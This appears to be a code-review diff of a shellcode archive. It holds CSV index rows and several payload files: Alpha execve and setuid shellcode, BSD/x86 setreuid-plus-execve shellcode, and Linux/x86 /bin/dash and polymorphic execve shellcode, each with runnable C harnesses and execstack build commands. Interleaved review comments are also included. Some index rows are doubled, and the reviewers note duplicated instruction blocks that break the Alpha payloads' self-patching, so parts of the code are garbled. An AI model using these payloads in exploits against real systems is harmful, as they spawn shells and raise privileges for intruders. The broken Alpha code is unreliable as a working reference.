43481,shellcodes/alpha/43481.c,"Alpha - execve() Shellcode (112 bytes)",2009-01-01,anonymous,shellcode,alpha
43482,shellcodes/alpha/43482.c,"Alpha - setuid() Shellcode (156 bytes)",2009-01-01,anonymous,shellcode,alpha
43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86
43489,shellcodes/lin_x86/43489.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,lin_x86
41630,shellcodes/lin_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,shellcode,lin_x86 41630,shellcodes/lin_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,shellcode,lin_x86
41631,shellcodes/lin_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,lin_x86 41631,shellcodes/lin_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,lin_x86
41635,shellcodes/lin_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)",2017-03-19,WangYihang,shellcode,lin_x86 41635,shellcodes/lin_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)",2017-03-19,WangYihang,shellcode,lin_x86
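Review bot: the 43483 description "setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_)" has underscores where the comma and the quotes of the call belong; if underscores are the deliberate substitute for characters the description field cannot carry, say so somewhere, but other rows in this file manage "execve(/bin/sh)" and "setuid(0) + execve /bin/sh" without them, so a form such as "setreuid(geteuid() geteuid()) + execve(/bin/sh)" would read better. Also, 43480, 43481, 43482 and 43483 all carry the identical date 2009-01-01 while 43476 and 43489 carry the commit date, and none of the four files states a date itself; if 2009-01-01 stands for "unknown" that should be documented. Finally, the three Alpha descriptions name only the architecture, whereas most rows here name the OS as well (Linux/x86, BSD/x86, Linux/SuperH (sh4)); the files use the callsys PALcode convention, so the OS they target should be spelled out.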

shellcodes/alpha/43480.c Normal file

@ -0,0 +1,29 @@
/*
Lamont Granquist
lamontg@hitl.washington.edu
lamontg@u.washington.edu
*/
int rawcode[] = {
0x2230fec4, /* subq $16,0x13c,$17 [2000]*/
0x47ff0412, /* clr $18 [2000]*/
0x42509532, /* subq $18, 0x84 [2000]*/
0x239fffff, /* xor $18, 0xffffffff, $18 */
0x4b84169c,
0x465c0812,
0xb2510134, /* stl $18, 0x134($17)[2000]*/
0x265cff98, /* lda $18, 0xff978cd0[2000]*/
0x22528cd1,
0x465c0812, /* xor $18, 0xffffffff, $18 */
0xb2510140, /* stl $18, 0x140($17)[2000]*/
0xb6110148, /* stq $16,0x148($17) [2000]*/
0xb7f10150, /* stq $31,0x150($17) [2000]*/
0x22310148, /* addq $17,0x148,$17 [2000]*/
0x225f013a, /* ldil $18,0x13a [2000]*/
0x425ff520, /* subq $18,0xff,$0 [2000]*/
0x47ff0412, /* clr $18 [2000]*/
0xffffffff, /* call_pal 0x83 [2000]*/
0xd21fffed, /* bsr $16,$l1 ENTRY */
0x6e69622f, /* .ascii "/bin" [2000]*/
/* .ascii "/sh\0" is generated */
};
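Review bot: the file never says where execution starts, yet the comment on the last instruction word (`bsr $16,$l1 ENTRY`) implies the payload is entered at that bsr near the end, not at rawcode[0]: the bsr loads $16 with the address of the "/bin" bytes that follow it and branches back to the top, so a reader who jumps to rawcode[0] gets nothing usable. State that in a header comment, together with the target OS (file and CSV description say only "Alpha"; the `call_pal 0x83` comment points at the callsys convention but the ABI should be named) and a build or test harness like the ones 43483.c, 43476.c and 43489.c ship with. The annotations also need a pass: the comment `xor $18, 0xffffffff, $18` appears on two different words (0x239fffff and 0x465c0812), the words 0x4b84169c and 0x465c0812 between them carry no comment at all, and the "[2000]" tags on most lines are never explained.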

shellcodes/alpha/43481.c Normal file

@ -0,0 +1,55 @@
char shellcode[]=
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
/* $16 = $30 - 200
/* $16 must have the shellcode address. However, before */
/* the bsr instruction, $16 can't have the address. */
/* This instruction just store the meaningless address. */
/* The all instruction before bsr are meaningless. */
"\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
/* $17 = 0 or 0x83 */
/* $17 = 0x83 */
"\x12\x94\x07\x42" /* addq $16,60,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
/* $17("\x83\x00\x00\x00") is stored in $16 + 60 - 4 */
/* address. */
/* ( "\xff\xff\xff\xff" -> "\x83\x00\x00\x00" ) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
/* $17 = "\x1f\x04\xff\x47" */
/* "\x1f\x04\xff\x47" is nop instruction. */
"\xfc\xff\x30\xb2" /* stl $17,-4($16) */
/* change "bsr $16,-28" instruction" into nop */
/* instruction to pass through the bsr instruction. */
/* ( "\xf9\xff\x1f\xd2" -> "\x1f\x04\xff\x47" ) */
"\xf9\xff\x1f\xd2" /* bsr $16,-28 */
/* Jump to "bis $31,0x83,$17" and store the current */
/* address in the $16. */
/* After jump, this insturction will be changed into */
/* nop instruction. */
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
"\xff\xff\xff\xff"; /* callsys ( disguised ) */
/* This will be changed to "\x83\x00\x00\x00" */
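Review bot: the five-word block `clr $18 / stq $16,-192($30) / stq $31,-184($30) / ldah $19,0xff98($31) / lda $19,0x8cd0($19)` appears twice in a row, and the duplicate breaks the self-patch the payload depends on. After `bsr $16,-28` (whose target, `bis $31,0x83,$17`, is right), $16 holds the address of the word following the bsr (`subq $30,200,$16`); `addq $16,60,$18` then `stl $17,-4($18)` therefore stores the 0x83 callsys word 56 bytes past that point, i.e. onto the 15th word after the bsr. In the file as committed that word is `ldah $19,0x6e69($31)`, which gets overwritten with 0x00000083 while the final disguised `\xff\xff\xff\xff` stays an illegal instruction; with the repeated block removed, the 15th word after the bsr is exactly that final word, which is what the trailing comment promises. Drop the duplicate (the payload becomes 23 words, 92 bytes, so the "112 bytes" in the CSV description has to follow) or recompute the offset, and close the comment that opens at `/* $16 = $30 - 200` on its own line instead of letting it swallow the next one.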

shellcodes/alpha/43482.c Normal file

@ -0,0 +1,40 @@
char shellcode[]=
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
"\x12\x14\x02\x42" /* addq $16,16,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\x12\x94\x09\x42" /* addq $16,76,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x12\x14\x02\x42" /* addq $16,16,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\x12\x94\x09\x42" /* addq $16,76,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
"\xfc\xff\x30\xb2" /* stl $17,-4($16) */
"\xf7\xff\x1f\xd2" /* bsr $16,-32 */
"\x10\x04\xff\x47" /* clr $16 */
"\x11\x14\xe3\x43" /* addq $31,24,$17 */
"\x20\x35\x20\x42" /* subq $17,1,$0 */
"\xff\xff\xff\xff" /* callsys ( disguised ) */
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
"\xff\xff\xff\xff"; /* callsys ( disguised ) */
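Review bot: two five-word blocks are duplicated (the `addq $16,16,$18 / stl $17,-4($18) / addq $16,76,$18 / stl $17,-4($18) / ldah $17,0x47ff($31)` sequence near the top, and `lda $19,0x8cd0($19) / ornot $31,$19,$19 / stl $19,-196($30) / ldah $19,0x6e69($31) / lda $19,0x622f($19)` near the bottom), and together they break the self-patching. After `bsr $16,-32`, $16 addresses the word following the bsr (`clr $16`); `addq $16,76,$18; stl $17,-4($18)` therefore patches the word 72 bytes past that point, which in the committed file is the second `ldah $19,0x6e69($31)`, not the final disguised `\xff\xff\xff\xff` that sits 92 bytes past it; without the lower duplicate the final word is exactly 72 bytes past. The upper duplicate spoils the branch target too: -32 bytes from the bsr lands on the repeated `addq $16,16,$18` rather than on `bis $31,0x83,$17`, so $17 still holds the nop encoding loaded by the preceding `ldah/lda` pair when the two stores run, and both 0xffffffff slots would receive a nop instead of callsys. Note also that the encoded displacement (`\xf7\xff\x1f\xd2`, a 21-bit field of 0x1ffff7, i.e. -9 words or -36 bytes) disagrees with the comment's -32; with both duplicates removed, -36 from the bsr is precisely the bis, which is the only target that makes the patch stores write 0x83. Remove both duplicates (29 words, 116 bytes, so the "156 bytes" in the CSV changes), fix the bsr comment, and re-verify every offset against the layout you intend to ship.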

@ -0,0 +1,25 @@
/*
* bsd/x86 setreuid/exec shellcode
*
* setreuid(geteuid(), geteuid()) and execve("/bin/sh", "/bin/sh", 0)
* shellcode based on hkpco's setreuid/exec shellcode for linux
* Tested on FreeBSD
*/
#include <stdio.h>
#include <string.h>
char shellcode[] =
"\x31\xc0\xb0\x19\x50\xcd\x80\x50"
"\x50\x31\xc0\xb0\x7e\x50\xcd\x80" // setreuid(geteuid(), getuid());
"\xeb\x0d\x5f\x31\xc0\x50\x89\xe2"
"\x52\x57\x54\xb0\x3b\xcd\x80\xe8"
"\xee\xff\xff\xff/bin/sh"; // exec(/bin/sh)
int main()
{
int (*f)() = (int (*)())shellcode;
printf("%d\n",strlen(shellcode));
f();
return 0;
}
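Review bot: the inline comment on the second syscall says `setreuid(geteuid(), getuid())`, but the code never calls getuid: the first block issues geteuid (syscall 0x19) and its result in eax is pushed twice (`\x50\x50`) before setreuid (0x7e), so both arguments are the same effective uid, which is what the header comment and the CSV description already say; correct the inline comment to match. The harness also casts a data array to a function pointer and calls it, which only works when the segment holding `shellcode` is executable on the test machine; 43476.c and 43489.c in this same commit spell out their `gcc -fno-stack-protector -z execstack` build line, and this file should give its build line and the FreeBSD version it was tested on (the header says only "Tested on FreeBSD"). Minor: `strlen` returns size_t, so the `%d` in the printf should be `%zu`.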

@ -0,0 +1,76 @@
/*
################## Description ####################
; Title : exec /bin/dash - Shellcode
; Author : Hashim Jawad
; Website : ihack4falafel[.]com
; Twitter : @ihack4falafel
; SLAE ID : SLAE-1115
; Purpose : spawn /bin/dash shell
; OS : Linux
; Arch : x86
; Size : 30 bytes
################### dash.nasm #####################
global _start
section .text
_start:
; push NULL into the stack
xor eax, eax
push eax
; push (////bin/dash) into the stack
push 0x68736164
push 0x2f6e6962
push 0x2f2f2f2f
; push ESP pointer to EBX
mov ebx, esp
; execute __NR_execve syscall
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 0xb
int 0x80
################### dash binary #####################
nasm -f elf32 -o dash.o dash.nasm
ld -z execstack -o dash dash.o
################### Shellcode ########################
objdump -d dash -M intel
################## Compile #########################
gcc -fno-stack-protector -z execstack dash.c -o dash
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
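Review bot: `main()` is declared without a return type (implicit int), which GCC 14 rejects by default and earlier versions warn about; write `int main(void)` and return 0. `strlen` returns size_t, so the `%d` in the printf should be `%zu`. The payload comments are accurate (the NULL is pushed first, then three dwords build `////bin/dash`, the extra slashes padding the path to 12 bytes so no partial store is needed, and ecx/edx end up pointing at a one-entry argv and an empty envp), but the `ld -z execstack` on the nasm build line is unnecessary, since that binary runs the bytes from .text; only the C harness, which executes them out of a writable array, needs `-z execstack`, and the header should say so rather than suggest both builds require it.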

@ -0,0 +1,66 @@
/*
# Title: Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
# Date: 10-Jan-2018
# Exploit Author: Debashis Pal <debashis.pals[at]gmail.com>
# SLAE-1122
# Tested on: i686 GNU/Linux
# '//bin/sh' = 0x68732f6e 0x69622f2f
########## polymorphic.nasm ##########
global _start
section .text
_start:
add esi, 0x30 ;junk
xor ecx, ecx
mul ecx
mov dword [esp-4], ecx
sub esp, 4
mov esi, 0x353ffc3b
add esi, 0x33333333 ; 0x68732f6e
mov dword [esp-4], esi
mov edi, 0xada67373
sub edi, 0x44444444 ; 0x69622f2f
mov dword [esp-8], edi
sub esp, 8
mov ebx, esp
mov al, 11
int 0x80
####################################
$ nasm -f elf polymorphic.nasm
$ ld -o polymorphic polymorphic.o
$ objdump -d ./polymorphic|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80"
$ gcc -fno-stack-protector -z execstack shellcode.c -o x86PolymorphicShellcodelinux32
$ ./x86PolymorphicShellcodelinux32
Shellcode Length: 53
$ uname -a
Linux kali 4.4.0-kali1-686 #1 SMP Debian 4.4.2-3kali1 (2016-02-23) i686 GNU/Linux
$
####################################
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35"
"\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44"
"\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
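Review bot: the payload passes argv = NULL and envp = NULL (ecx is zeroed by `xor ecx, ecx`, edx by `mul ecx`, and neither is reloaded before `int 0x80`); Linux accepts a NULL argv for execve, so the example runs on the i686 Kali box listed, but it is the one non-portable shortcut in the code and deserves a comment, since anyone adapting the bytes to a BSD target or a stricter kernel will get a failing execve. `strlen` returns size_t, so the `%d` in the harness should be `%zu`. Also worth stating in the header: the polymorphism here consists of one junk instruction (`add esi, 0x30`), `mov dword [esp-N]` plus `sub esp` in place of push, and add/sub pairs that reconstruct the two string dwords; the closing `mov ebx, esp / mov al, 11 / int 0x80` (`\x89\xe3\xb0\x0b\xcd\x80`) is left verbatim, so a signature keyed on that tail still matches.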